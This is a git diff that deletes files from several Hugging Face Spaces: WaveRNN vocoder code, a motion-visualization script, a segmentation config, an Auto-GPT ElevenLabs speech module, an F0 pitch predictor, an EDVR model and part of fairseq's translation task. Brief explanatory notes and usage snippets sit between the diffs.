- sample = 2 * distrib.sample().float() / (self.n_classes - 1.0) - 1.0
- output.append(sample)
- x = sample.unsqueeze(-1)
- else:
- raise RuntimeError("Unknown model mode value - ", self.mode)
-
- output = torch.stack(output).transpose(0, 1)
- output = output.cpu().numpy()
- output = output.astype(np.float64)
-
- if batched:
- output = self.xfade_and_unfold(output, target, overlap)
- else:
- output = output[0]
-
- if mu_law:
- output = decode_mu_law(output, self.n_classes, False)
- if hp.apply_preemphasis:
- output = de_emphasis(output)
-
- # Fade-out at the end to avoid signal cutting out suddenly
- fade_out = np.linspace(1, 0, 20 * self.hop_length)
- output = output[:wave_len]
- output[-20 * self.hop_length :] *= fade_out
-
- self.train()
-
- return output
-
- def get_gru_cell(self, gru):
- gru_cell = nn.GRUCell(gru.input_size, gru.hidden_size)
- gru_cell.weight_hh.data = gru.weight_hh_l0.data
- gru_cell.weight_ih.data = gru.weight_ih_l0.data
- gru_cell.bias_hh.data = gru.bias_hh_l0.data
- gru_cell.bias_ih.data = gru.bias_ih_l0.data
- return gru_cell
-
- def pad_tensor(self, x, pad, side="both"):
-        # NB - this is just a quick method I need right now
- # i.e., it won't generalise to other shapes/dims
- b, t, c = x.size()
- total = t + 2 * pad if side == "both" else t + pad
- if torch.cuda.is_available():
- padded = torch.zeros(b, total, c).cuda()
- else:
- padded = torch.zeros(b, total, c).cpu()
- if side == "before" or side == "both":
- padded[:, pad : pad + t, :] = x
- elif side == "after":
- padded[:, :t, :] = x
- return padded
-
- def fold_with_overlap(self, x, target, overlap):
-
- """Fold the tensor with overlap for quick batched inference.
- Overlap will be used for crossfading in xfade_and_unfold()
-
- Args:
- x (tensor) : Upsampled conditioning features.
- shape=(1, timesteps, features)
- target (int) : Target timesteps for each index of batch
- overlap (int) : Timesteps for both xfade and rnn warmup
-
- Return:
- (tensor) : shape=(num_folds, target + 2 * overlap, features)
-
- Details:
- x = [[h1, h2, ... hn]]
-
- Where each h is a vector of conditioning features
-
- Eg: target=2, overlap=1 with x.size(1)=10
-
- folded = [[h1, h2, h3, h4],
- [h4, h5, h6, h7],
- [h7, h8, h9, h10]]
- """
-
- _, total_len, features = x.size()
-
- # Calculate variables needed
- num_folds = (total_len - overlap) // (target + overlap)
- extended_len = num_folds * (overlap + target) + overlap
- remaining = total_len - extended_len
-
- # Pad if some time steps poking out
- if remaining != 0:
- num_folds += 1
- padding = target + 2 * overlap - remaining
- x = self.pad_tensor(x, padding, side="after")
-
- if torch.cuda.is_available():
- folded = torch.zeros(num_folds, target + 2 * overlap, features).cuda()
- else:
- folded = torch.zeros(num_folds, target + 2 * overlap, features).cpu()
-
- # Get the values for the folded tensor
- for i in range(num_folds):
- start = i * (target + overlap)
- end = start + target + 2 * overlap
- folded[i] = x[:, start:end, :]
-
- return folded
-
- def xfade_and_unfold(self, y, target, overlap):
-
- """Applies a crossfade and unfolds into a 1d array.
-
- Args:
-            y (ndarray) : Batched sequences of audio samples
- shape=(num_folds, target + 2 * overlap)
- dtype=np.float64
- overlap (int) : Timesteps for both xfade and rnn warmup
-
- Return:
-            (ndarray) : audio samples in a 1d array
- shape=(total_len)
- dtype=np.float64
-
- Details:
- y = [[seq1],
- [seq2],
- [seq3]]
-
- Apply a gain envelope at both ends of the sequences
-
- y = [[seq1_in, seq1_target, seq1_out],
- [seq2_in, seq2_target, seq2_out],
- [seq3_in, seq3_target, seq3_out]]
-
- Stagger and add up the groups of samples:
-
- [seq1_in, seq1_target, (seq1_out + seq2_in), seq2_target, ...]
-
- """
-
- num_folds, length = y.shape
- target = length - 2 * overlap
- total_len = num_folds * (target + overlap) + overlap
-
- # Need some silence for the rnn warmup
- silence_len = overlap // 2
- fade_len = overlap - silence_len
- silence = np.zeros((silence_len), dtype=np.float64)
-
- # Equal power crossfade
- t = np.linspace(-1, 1, fade_len, dtype=np.float64)
- fade_in = np.sqrt(0.5 * (1 + t))
- fade_out = np.sqrt(0.5 * (1 - t))
-
- # Concat the silence to the fades
- fade_in = np.concatenate([silence, fade_in])
- fade_out = np.concatenate([fade_out, silence])
-
- # Apply the gain to the overlap samples
- y[:, :overlap] *= fade_in
- y[:, -overlap:] *= fade_out
-
- unfolded = np.zeros((total_len), dtype=np.float64)
-
- # Loop to add up all the samples
- for i in range(num_folds):
- start = i * (target + overlap)
- end = start + target + 2 * overlap
- unfolded[start:end] += y[i]
-
- return unfolded
-
- def get_step(self):
- return self.step.data.item()
-
- def checkpoint(self, model_dir, optimizer):
- k_steps = self.get_step() // 1000
- self.save(model_dir.joinpath("checkpoint_%dk_steps.pt" % k_steps), optimizer)
-
- def load(self, path, optimizer):
- checkpoint = torch.load(path)
- if "optimizer_state" in checkpoint:
- self.load_state_dict(checkpoint["model_state"])
- optimizer.load_state_dict(checkpoint["optimizer_state"])
- else:
- # Backwards compatibility
- self.load_state_dict(checkpoint)
-
- def save(self, path, optimizer):
- torch.save(
- {
- "model_state": self.state_dict(),
- "optimizer_state": optimizer.state_dict(),
- },
- path,
- )
-
- def num_params(self):
- parameters = filter(lambda p: p.requires_grad, self.parameters())
- parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000
- logger.debug("Trainable Parameters: %.3fM" % parameters)
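A small shape-level check of the fold_with_overlap bookkeeping documented above, using random conditioning features; the constructor hyperparameters are illustrative and not taken from this repo's hparams.

import torch

model = WaveRNN(rnn_dims=512, fc_dims=512, bits=9, pad=2,
                upsample_factors=(5, 5, 8), feat_dims=80,
                compute_dims=128, res_out_dims=128, res_blocks=10,
                hop_length=200, sample_rate=16000, mode="MOL")

x = torch.rand(1, 1000, 80)  # fake upsampled conditioning features
folded = model.fold_with_overlap(x, target=800, overlap=100)
print(folded.shape)  # (1, 1000, 80): num_folds x (target + 2 * overlap) x features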
diff --git a/spaces/Marshalls/testmtd/analysis/visualization/generate_video_from_moglow_pos.py b/spaces/Marshalls/testmtd/analysis/visualization/generate_video_from_moglow_pos.py
deleted file mode 100644
index 37348857716ebc4e3bf7f441d9adba40bcdb5de8..0000000000000000000000000000000000000000
--- a/spaces/Marshalls/testmtd/analysis/visualization/generate_video_from_moglow_pos.py
+++ /dev/null
@@ -1,76 +0,0 @@
-import pickle
-import matplotlib.pyplot as plt
-import numpy as np
-from sklearn.pipeline import Pipeline
-import joblib as jl
-from .utils import generate_video_from_images, join_video_and_audio
-import os
-#root_dir = os.path.dirname(os.path.realpath(__file__))
-
-import matplotlib
-matplotlib.use("Agg")
-import matplotlib.pyplot as plt
-from mpl_toolkits.mplot3d import Axes3D
-import numpy as np
-from scipy.spatial.transform import Rotation as R
-
-def pre_process_motion_data(clip, init_rot=None, init_trans=None, fps=30, axis_scale=50, elev=45, azim=45):
- rot = init_rot if init_rot is not None else R.from_quat([0,0,0,1])
- translation = init_trans if init_trans is not None else np.array([[0,0,0]])
- translations = np.zeros((clip.shape[0],3))
-
- joints, root_dx, root_dz, root_dr = clip[:,:-3], clip[:,-3], clip[:,-2], clip[:,-1]
- joints = joints.reshape((len(joints), -1, 3))
- for i in range(len(joints)):
- joints[i,:,:] = rot.apply(joints[i])
- joints[i,:,0] = joints[i,:,0] + translation[0,0]
- joints[i,:,2] = joints[i,:,2] + translation[0,2]
- rot = R.from_rotvec(np.array([0,-root_dr[i],0])) * rot
- translation = translation + rot.apply(np.array([root_dx[i], 0, root_dz[i]]))
- translations[i,:] = translation
-
- return joints, translation, rot, translations
-
-def generate_video_from_moglow_loc(data, control, output_folder, seq_id, audio_file, fps, trim_audio=0):
- # import pdb;pdb.set_trace()
- clip = np.concatenate([data,control], axis=1)
-
- joints, translation, rot, translations = pre_process_motion_data(clip, fps=20, axis_scale=50, elev=45, azim=45)
-
- fig = plt.figure()
- plt.ion()
- plt.show()
- ax = Axes3D(fig)
- keypoints3d = joints
-
- ax.scatter(keypoints3d[0,:,0],keypoints3d[0,:,1],keypoints3d[0,:,2])
-
- imgs_folder="analysis/visualization/img/"+seq_id
- if not os.path.exists(imgs_folder):
- os.mkdir(imgs_folder)
-
- plt.xlim([-10,10])
- plt.ylim([0,20])
- ax.set_zlim([-10,10])
- ax.view_init(90,-90)
- plt.draw()
- plt.pause(0.001)
- plt.savefig(imgs_folder+"/img_"+str(0)+".png")
-
- for i in range(1,len(keypoints3d)):
- print(i)
- ax.clear()
- ax.scatter(keypoints3d[i,:,0], keypoints3d[i,:,1], keypoints3d[i,:,2])
- plt.xlim([-10,10])
- plt.ylim([0,20])
- ax.set_zlim([-10,10])
- ax.view_init(90,-90)
- plt.draw()
- plt.pause(0.001)
- plt.savefig(imgs_folder+"/img_"+str(i)+".png")
-
- video_file = f'{output_folder}/{seq_id}.mp4'
- generate_video_from_images(imgs_folder, video_file, fps)
- if audio_file is not None:
- join_video_and_audio(video_file, audio_file, trim_audio)
-
diff --git a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/exp/upernet_global_small/test_config_g.py b/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/exp/upernet_global_small/test_config_g.py
deleted file mode 100644
index e43737a98a3b174a9f2fe059c06d511144686459..0000000000000000000000000000000000000000
--- a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/exp/upernet_global_small/test_config_g.py
+++ /dev/null
@@ -1,38 +0,0 @@
-_base_ = [
- '../../configs/_base_/models/upernet_uniformer.py',
- '../../configs/_base_/datasets/ade20k.py',
- '../../configs/_base_/default_runtime.py',
- '../../configs/_base_/schedules/schedule_160k.py'
-]
-model = dict(
- backbone=dict(
- type='UniFormer',
- embed_dim=[64, 128, 320, 512],
- layers=[3, 4, 8, 3],
- head_dim=64,
- drop_path_rate=0.25,
- windows=False,
- hybrid=False,
- ),
- decode_head=dict(
- in_channels=[64, 128, 320, 512],
- num_classes=150
- ),
- auxiliary_head=dict(
- in_channels=320,
- num_classes=150
- ))
-
-# AdamW optimizer, no weight decay for position embedding & layer norm in backbone
-optimizer = dict(_delete_=True, type='AdamW', lr=0.00006, betas=(0.9, 0.999), weight_decay=0.01,
- paramwise_cfg=dict(custom_keys={'absolute_pos_embed': dict(decay_mult=0.),
- 'relative_position_bias_table': dict(decay_mult=0.),
- 'norm': dict(decay_mult=0.)}))
-
-lr_config = dict(_delete_=True, policy='poly',
- warmup='linear',
- warmup_iters=1500,
- warmup_ratio=1e-6,
- power=1.0, min_lr=0.0, by_epoch=False)
-
-data=dict(samples_per_gpu=2)
\ No newline at end of file
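The file above is an mmsegmentation-style config: the `_base_` list pulls in shared model/dataset/schedule fragments, the child dicts are deep-merged over them, and `_delete_=True` replaces an inherited key outright instead of merging into it. A rough sketch of how such a config is typically loaded; the `mmcv.Config` API here assumes an mmcv 1.x-era install with the `_base_` files on disk (newer stacks use `mmengine.Config` instead).

from mmcv import Config

cfg = Config.fromfile("test_config_g.py")      # resolves the _base_ chain, then merges
print(cfg.model.backbone.type)                 # 'UniFormer'
print(cfg.optimizer.type, cfg.optimizer.lr)    # 'AdamW' 6e-05
# optimizer and lr_config set _delete_=True above, so the inherited SGD/step
# settings from schedule_160k.py are dropped rather than merged into.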
diff --git a/spaces/MetaWabbit/Auto-GPT/autogpt/processing/__init__.py b/spaces/MetaWabbit/Auto-GPT/autogpt/processing/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/MetaWabbit/Auto-GPT/autogpt/speech/eleven_labs.py b/spaces/MetaWabbit/Auto-GPT/autogpt/speech/eleven_labs.py
deleted file mode 100644
index ea84efd8ca9489b40919ecd571813fe954b078e3..0000000000000000000000000000000000000000
--- a/spaces/MetaWabbit/Auto-GPT/autogpt/speech/eleven_labs.py
+++ /dev/null
@@ -1,86 +0,0 @@
-"""ElevenLabs speech module"""
-import os
-
-import requests
-from playsound import playsound
-
-from autogpt.config import Config
-from autogpt.speech.base import VoiceBase
-
-PLACEHOLDERS = {"your-voice-id"}
-
-
-class ElevenLabsSpeech(VoiceBase):
- """ElevenLabs speech class"""
-
- def _setup(self) -> None:
- """Set up the voices, API key, etc.
-
- Returns:
- None: None
- """
-
- cfg = Config()
- default_voices = ["ErXwobaYiN019PkySvjV", "EXAVITQu4vr4xnSDxMaL"]
- voice_options = {
- "Rachel": "21m00Tcm4TlvDq8ikWAM",
- "Domi": "AZnzlk1XvdvUeBnXmlld",
- "Bella": "EXAVITQu4vr4xnSDxMaL",
- "Antoni": "ErXwobaYiN019PkySvjV",
- "Elli": "MF3mGyEYCl7XYWbV9V6O",
- "Josh": "TxGEqnHWrfWFTfGW9XjX",
- "Arnold": "VR6AewLTigWG4xSOukaG",
- "Adam": "pNInz6obpgDQGcFmaJgB",
- "Sam": "yoZ06aMxZJJ28mfd3POQ",
- }
- self._headers = {
- "Content-Type": "application/json",
- "xi-api-key": cfg.elevenlabs_api_key,
- }
- self._voices = default_voices.copy()
- if cfg.elevenlabs_voice_1_id in voice_options:
- cfg.elevenlabs_voice_1_id = voice_options[cfg.elevenlabs_voice_1_id]
- if cfg.elevenlabs_voice_2_id in voice_options:
- cfg.elevenlabs_voice_2_id = voice_options[cfg.elevenlabs_voice_2_id]
- self._use_custom_voice(cfg.elevenlabs_voice_1_id, 0)
- self._use_custom_voice(cfg.elevenlabs_voice_2_id, 1)
-
- def _use_custom_voice(self, voice, voice_index) -> None:
- """Use a custom voice if provided and not a placeholder
-
- Args:
- voice (str): The voice ID
- voice_index (int): The voice index
-
- Returns:
- None: None
- """
- # Placeholder values that should be treated as empty
- if voice and voice not in PLACEHOLDERS:
- self._voices[voice_index] = voice
-
- def _speech(self, text: str, voice_index: int = 0) -> bool:
- """Speak text using elevenlabs.io's API
-
- Args:
- text (str): The text to speak
- voice_index (int, optional): The voice to use. Defaults to 0.
-
- Returns:
- bool: True if the request was successful, False otherwise
- """
- tts_url = (
- f"https://api.elevenlabs.io/v1/text-to-speech/{self._voices[voice_index]}"
- )
- response = requests.post(tts_url, headers=self._headers, json={"text": text})
-
- if response.status_code == 200:
- with open("speech.mpeg", "wb") as f:
- f.write(response.content)
- playsound("speech.mpeg", True)
- os.remove("speech.mpeg")
- return True
- else:
- print("Request failed with status code:", response.status_code)
- print("Response content:", response.content)
- return False
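`_speech()` above is a thin wrapper around a single POST to the ElevenLabs text-to-speech endpoint. Below is a minimal requests-only sketch of that call; the environment-variable name and the choice of the "Rachel" voice ID (taken from the table above) are illustrative, and error handling is reduced to a print.

import os
import requests

API_KEY = os.environ.get("ELEVENLABS_API_KEY", "your-api-key")  # placeholder env var
VOICE_ID = "21m00Tcm4TlvDq8ikWAM"                               # "Rachel" in the table above

url = f"https://api.elevenlabs.io/v1/text-to-speech/{VOICE_ID}"
headers = {"Content-Type": "application/json", "xi-api-key": API_KEY}
resp = requests.post(url, headers=headers, json={"text": "Hello from the speech module."})

if resp.status_code == 200:
    with open("speech.mpeg", "wb") as f:   # same temporary file name the class uses
        f.write(resp.content)
else:
    print("Request failed:", resp.status_code, resp.text)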
diff --git a/spaces/MirageML/sjc/sd1/ldm/modules/distributions/__init__.py b/spaces/MirageML/sjc/sd1/ldm/modules/distributions/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/MrBodean/VoiceClone/utils/__init__.py b/spaces/MrBodean/VoiceClone/utils/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/NMEX/rvc-hoyogame-v2/lib/infer_pack/modules/F0Predictor/DioF0Predictor.py b/spaces/NMEX/rvc-hoyogame-v2/lib/infer_pack/modules/F0Predictor/DioF0Predictor.py
deleted file mode 100644
index ee3171bcb7c4a5066560723108b56e055f18be45..0000000000000000000000000000000000000000
--- a/spaces/NMEX/rvc-hoyogame-v2/lib/infer_pack/modules/F0Predictor/DioF0Predictor.py
+++ /dev/null
@@ -1,90 +0,0 @@
-from lib.infer_pack.modules.F0Predictor.F0Predictor import F0Predictor
-import pyworld
-import numpy as np
-
-
-class DioF0Predictor(F0Predictor):
- def __init__(self, hop_length=512, f0_min=50, f0_max=1100, sampling_rate=44100):
- self.hop_length = hop_length
- self.f0_min = f0_min
- self.f0_max = f0_max
- self.sampling_rate = sampling_rate
-
- def interpolate_f0(self, f0):
- """
- Interpolate the F0 sequence (fill in unvoiced/zero frames)
- """
-
- data = np.reshape(f0, (f0.size, 1))
-
- vuv_vector = np.zeros((data.size, 1), dtype=np.float32)
- vuv_vector[data > 0.0] = 1.0
- vuv_vector[data <= 0.0] = 0.0
-
- ip_data = data
-
- frame_number = data.size
- last_value = 0.0
- for i in range(frame_number):
- if data[i] <= 0.0:
- j = i + 1
- for j in range(i + 1, frame_number):
- if data[j] > 0.0:
- break
- if j < frame_number - 1:
- if last_value > 0.0:
- step = (data[j] - data[i - 1]) / float(j - i)
- for k in range(i, j):
- ip_data[k] = data[i - 1] + step * (k - i + 1)
- else:
- for k in range(i, j):
- ip_data[k] = data[j]
- else:
- for k in range(i, frame_number):
- ip_data[k] = last_value
- else:
- ip_data[i] = data[i]  # this copy may be unnecessary
- last_value = data[i]
-
- return ip_data[:, 0], vuv_vector[:, 0]
-
- def resize_f0(self, x, target_len):
- source = np.array(x)
- source[source < 0.001] = np.nan
- target = np.interp(
- np.arange(0, len(source) * target_len, len(source)) / target_len,
- np.arange(0, len(source)),
- source,
- )
- res = np.nan_to_num(target)
- return res
-
- def compute_f0(self, wav, p_len=None):
- if p_len is None:
- p_len = wav.shape[0] // self.hop_length
- f0, t = pyworld.dio(
- wav.astype(np.double),
- fs=self.sampling_rate,
- f0_floor=self.f0_min,
- f0_ceil=self.f0_max,
- frame_period=1000 * self.hop_length / self.sampling_rate,
- )
- f0 = pyworld.stonemask(wav.astype(np.double), f0, t, self.sampling_rate)
- for index, pitch in enumerate(f0):
- f0[index] = round(pitch, 1)
- return self.interpolate_f0(self.resize_f0(f0, p_len))[0]
-
- def compute_f0_uv(self, wav, p_len=None):
- if p_len is None:
- p_len = wav.shape[0] // self.hop_length
- f0, t = pyworld.dio(
- wav.astype(np.double),
- fs=self.sampling_rate,
- f0_floor=self.f0_min,
- f0_ceil=self.f0_max,
- frame_period=1000 * self.hop_length / self.sampling_rate,
- )
- f0 = pyworld.stonemask(wav.astype(np.double), f0, t, self.sampling_rate)
- for index, pitch in enumerate(f0):
- f0[index] = round(pitch, 1)
- return self.interpolate_f0(self.resize_f0(f0, p_len))
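`compute_f0()` above is essentially pyworld's DIO pitch tracker refined by StoneMask, with unvoiced (zero) frames filled in afterwards by `interpolate_f0()`. A hedged usage sketch follows, calling pyworld directly with the same parameters; the synthetic 220 Hz tone, sample rate, and hop size are made up for illustration.

import numpy as np
import pyworld

sr, hop = 44100, 512
t = np.arange(sr) / sr
wav = 0.5 * np.sin(2 * np.pi * 220.0 * t)        # 1 s synthetic 220 Hz tone

f0, times = pyworld.dio(
    wav.astype(np.double), fs=sr,
    f0_floor=50, f0_ceil=1100,
    frame_period=1000 * hop / sr,
)
f0 = pyworld.stonemask(wav.astype(np.double), f0, times, sr)  # refine the raw DIO track
print(f0.shape, float(np.median(f0[f0 > 0])))                 # median of voiced frames ~220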
diff --git a/spaces/OAOA/DifFace/basicsr/models/edvr_model.py b/spaces/OAOA/DifFace/basicsr/models/edvr_model.py
deleted file mode 100644
index 9bdbf7b94fe3f06c76fbf2a4941621f64e0003e7..0000000000000000000000000000000000000000
--- a/spaces/OAOA/DifFace/basicsr/models/edvr_model.py
+++ /dev/null
@@ -1,62 +0,0 @@
-from basicsr.utils import get_root_logger
-from basicsr.utils.registry import MODEL_REGISTRY
-from .video_base_model import VideoBaseModel
-
-
-@MODEL_REGISTRY.register()
-class EDVRModel(VideoBaseModel):
- """EDVR Model.
-
- Paper: EDVR: Video Restoration with Enhanced Deformable Convolutional Networks. # noqa: E501
- """
-
- def __init__(self, opt):
- super(EDVRModel, self).__init__(opt)
- if self.is_train:
- self.train_tsa_iter = opt['train'].get('tsa_iter')
-
- def setup_optimizers(self):
- train_opt = self.opt['train']
- dcn_lr_mul = train_opt.get('dcn_lr_mul', 1)
- logger = get_root_logger()
- logger.info(f'Multiply the learning rate for dcn by {dcn_lr_mul}.')
- if dcn_lr_mul == 1:
- optim_params = self.net_g.parameters()
- else: # separate dcn params and normal params for different lr
- normal_params = []
- dcn_params = []
- for name, param in self.net_g.named_parameters():
- if 'dcn' in name:
- dcn_params.append(param)
- else:
- normal_params.append(param)
- optim_params = [
- { # add normal params first
- 'params': normal_params,
- 'lr': train_opt['optim_g']['lr']
- },
- {
- 'params': dcn_params,
- 'lr': train_opt['optim_g']['lr'] * dcn_lr_mul
- },
- ]
-
- optim_type = train_opt['optim_g'].pop('type')
- self.optimizer_g = self.get_optimizer(optim_type, optim_params, **train_opt['optim_g'])
- self.optimizers.append(self.optimizer_g)
-
- def optimize_parameters(self, current_iter):
- if self.train_tsa_iter:
- if current_iter == 1:
- logger = get_root_logger()
- logger.info(f'Only train TSA module for {self.train_tsa_iter} iters.')
- for name, param in self.net_g.named_parameters():
- if 'fusion' not in name:
- param.requires_grad = False
- elif current_iter == self.train_tsa_iter:
- logger = get_root_logger()
- logger.warning('Train all the parameters.')
- for param in self.net_g.parameters():
- param.requires_grad = True
-
- super(EDVRModel, self).optimize_parameters(current_iter)
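`optimize_parameters()` above implements a two-stage schedule: for the first `train_tsa_iter` iterations only parameters whose names contain "fusion" (the TSA module) receive gradients, after which everything is unfrozen. A generic sketch of that freezing pattern in plain PyTorch, with made-up module names:

import torch.nn as nn

def set_stage(model: nn.Module, current_iter: int, warmup_iters: int) -> None:
    """Train only the 'fusion' submodule for the first warmup_iters iterations."""
    if current_iter < warmup_iters:
        for name, param in model.named_parameters():
            param.requires_grad = "fusion" in name
    elif current_iter == warmup_iters:
        for param in model.parameters():
            param.requires_grad = True      # unfreeze everything from here on

model = nn.ModuleDict({"fusion": nn.Linear(4, 4), "backbone": nn.Linear(4, 4)})
set_stage(model, current_iter=0, warmup_iters=100)
print([n for n, p in model.named_parameters() if p.requires_grad])  # fusion.* only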
diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/tasks/translation.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/tasks/translation.py
deleted file mode 100644
index 86473608677c62b063cd9889ed29d59002523be7..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/tasks/translation.py
+++ /dev/null
@@ -1,493 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-from dataclasses import dataclass, field
-import itertools
-import json
-import logging
-import os
-from typing import Optional
-from argparse import Namespace
-from omegaconf import II
-
-import numpy as np
-from fairseq import metrics, utils
-from fairseq.data import (
- AppendTokenDataset,
- ConcatDataset,
- LanguagePairDataset,
- PrependTokenDataset,
- StripTokenDataset,
- TruncateDataset,
- data_utils,
- encoders,
- indexed_dataset,
-)
-from fairseq.data.indexed_dataset import get_available_dataset_impl
-from fairseq.dataclass import ChoiceEnum, FairseqDataclass
-from fairseq.tasks import FairseqTask, register_task
-
-
-EVAL_BLEU_ORDER = 4
-
-
-logger = logging.getLogger(__name__)
-
-
-def load_langpair_dataset(
- data_path,
- split,
- src,
- src_dict,
- tgt,
- tgt_dict,
- combine,
- dataset_impl,
- upsample_primary,
- left_pad_source,
- left_pad_target,
- max_source_positions,
- max_target_positions,
- prepend_bos=False,
- load_alignments=False,
- truncate_source=False,
- append_source_id=False,
- num_buckets=0,
- shuffle=True,
- pad_to_multiple=1,
- prepend_bos_src=None,
-):
- def split_exists(split, src, tgt, lang, data_path):
- filename = os.path.join(data_path, "{}.{}-{}.{}".format(split, src, tgt, lang))
- return indexed_dataset.dataset_exists(filename, impl=dataset_impl)
-
- src_datasets = []
- tgt_datasets = []
-
- for k in itertools.count():
- split_k = split + (str(k) if k > 0 else "")
-
- # infer langcode
- if split_exists(split_k, src, tgt, src, data_path):
- prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, src, tgt))
- elif split_exists(split_k, tgt, src, src, data_path):
- prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, tgt, src))
- else:
- if k > 0:
- break
- else:
- raise FileNotFoundError(
- "Dataset not found: {} ({})".format(split, data_path)
- )
-
- src_dataset = data_utils.load_indexed_dataset(
- prefix + src, src_dict, dataset_impl
- )
- if truncate_source:
- src_dataset = AppendTokenDataset(
- TruncateDataset(
- StripTokenDataset(src_dataset, src_dict.eos()),
- max_source_positions - 1,
- ),
- src_dict.eos(),
- )
- src_datasets.append(src_dataset)
-
- tgt_dataset = data_utils.load_indexed_dataset(
- prefix + tgt, tgt_dict, dataset_impl
- )
- if tgt_dataset is not None:
- tgt_datasets.append(tgt_dataset)
-
- logger.info(
- "{} {} {}-{} {} examples".format(
- data_path, split_k, src, tgt, len(src_datasets[-1])
- )
- )
-
- if not combine:
- break
-
- assert len(src_datasets) == len(tgt_datasets) or len(tgt_datasets) == 0
-
- if len(src_datasets) == 1:
- src_dataset = src_datasets[0]
- tgt_dataset = tgt_datasets[0] if len(tgt_datasets) > 0 else None
- else:
- sample_ratios = [1] * len(src_datasets)
- sample_ratios[0] = upsample_primary
- src_dataset = ConcatDataset(src_datasets, sample_ratios)
- if len(tgt_datasets) > 0:
- tgt_dataset = ConcatDataset(tgt_datasets, sample_ratios)
- else:
- tgt_dataset = None
-
- if prepend_bos:
- assert hasattr(src_dict, "bos_index") and hasattr(tgt_dict, "bos_index")
- src_dataset = PrependTokenDataset(src_dataset, src_dict.bos())
- if tgt_dataset is not None:
- tgt_dataset = PrependTokenDataset(tgt_dataset, tgt_dict.bos())
- elif prepend_bos_src is not None:
- logger.info(f"prepending src bos: {prepend_bos_src}")
- src_dataset = PrependTokenDataset(src_dataset, prepend_bos_src)
-
- eos = None
- if append_source_id:
- src_dataset = AppendTokenDataset(
- src_dataset, src_dict.index("[{}]".format(src))
- )
- if tgt_dataset is not None:
- tgt_dataset = AppendTokenDataset(
- tgt_dataset, tgt_dict.index("[{}]".format(tgt))
- )
- eos = tgt_dict.index("[{}]".format(tgt))
-
- align_dataset = None
- if load_alignments:
- align_path = os.path.join(data_path, "{}.align.{}-{}".format(split, src, tgt))
- if indexed_dataset.dataset_exists(align_path, impl=dataset_impl):
- align_dataset = data_utils.load_indexed_dataset(
- align_path, None, dataset_impl
- )
-
- tgt_dataset_sizes = tgt_dataset.sizes if tgt_dataset is not None else None
- return LanguagePairDataset(
- src_dataset,
- src_dataset.sizes,
- src_dict,
- tgt_dataset,
- tgt_dataset_sizes,
- tgt_dict,
- left_pad_source=left_pad_source,
- left_pad_target=left_pad_target,
- align_dataset=align_dataset,
- eos=eos,
- num_buckets=num_buckets,
- shuffle=shuffle,
- pad_to_multiple=pad_to_multiple,
- )
-
-
-@dataclass
-class TranslationConfig(FairseqDataclass):
- data: Optional[str] = field(
- default=None,
- metadata={
- "help": "colon separated path to data directories list, will be iterated upon during epochs "
- "in round-robin manner; however, valid and test data are always in the first directory "
- "to avoid the need for repeating them in all directories"
- },
- )
- source_lang: Optional[str] = field(
- default=None,
- metadata={
- "help": "source language",
- "argparse_alias": "-s",
- },
- )
- target_lang: Optional[str] = field(
- default=None,
- metadata={
- "help": "target language",
- "argparse_alias": "-t",
- },
- )
- load_alignments: bool = field(
- default=False, metadata={"help": "load the binarized alignments"}
- )
- left_pad_source: bool = field(
- default=True, metadata={"help": "pad the source on the left"}
- )
- left_pad_target: bool = field(
- default=False, metadata={"help": "pad the target on the left"}
- )
- max_source_positions: int = field(
- default=1024, metadata={"help": "max number of tokens in the source sequence"}
- )
- max_target_positions: int = field(
- default=1024, metadata={"help": "max number of tokens in the target sequence"}
- )
- upsample_primary: int = field(
- default=-1, metadata={"help": "the amount of upsample primary dataset"}
- )
- truncate_source: bool = field(
- default=False, metadata={"help": "truncate source to max-source-positions"}
- )
- num_batch_buckets: int = field(
- default=0,
- metadata={
- "help": "if >0, then bucket source and target lengths into "
- "N buckets and pad accordingly; this is useful on TPUs to minimize the number of compilations"
- },
- )
- train_subset: str = II("dataset.train_subset")
- dataset_impl: Optional[ChoiceEnum(get_available_dataset_impl())] = II(
- "dataset.dataset_impl"
- )
- required_seq_len_multiple: int = II("dataset.required_seq_len_multiple")
-
- # options for reporting BLEU during validation
- eval_bleu: bool = field(
- default=False, metadata={"help": "evaluation with BLEU scores"}
- )
- eval_bleu_args: Optional[str] = field(
- default="{}",
- metadata={
- "help": 'generation args for BLUE scoring, e.g., \'{"beam": 4, "lenpen": 0.6}\', as JSON string'
- },
- )
- eval_bleu_detok: str = field(
- default="space",
- metadata={
- "help": "detokenize before computing BLEU (e.g., 'moses'); required if using --eval-bleu; "
- "use 'space' to disable detokenization; see fairseq.data.encoders for other options"
- },
- )
- eval_bleu_detok_args: Optional[str] = field(
- default="{}",
- metadata={"help": "args for building the tokenizer, if needed, as JSON string"},
- )
- eval_tokenized_bleu: bool = field(
- default=False, metadata={"help": "compute tokenized BLEU instead of sacrebleu"}
- )
- eval_bleu_remove_bpe: Optional[str] = field(
- default=None,
- metadata={
- "help": "remove BPE before computing BLEU",
- "argparse_const": "@@ ",
- },
- )
- eval_bleu_print_samples: bool = field(
- default=False, metadata={"help": "print sample generations during validation"}
- )
-
-
-@register_task("translation", dataclass=TranslationConfig)
-class TranslationTask(FairseqTask):
- """
- Translate from one (source) language to another (target) language.
-
- Args:
- src_dict (~fairseq.data.Dictionary): dictionary for the source language
- tgt_dict (~fairseq.data.Dictionary): dictionary for the target language
-
- .. note::
-
- The translation task is compatible with :mod:`fairseq-train`,
- :mod:`fairseq-generate` and :mod:`fairseq-interactive`.
- """
-
- cfg: TranslationConfig
-
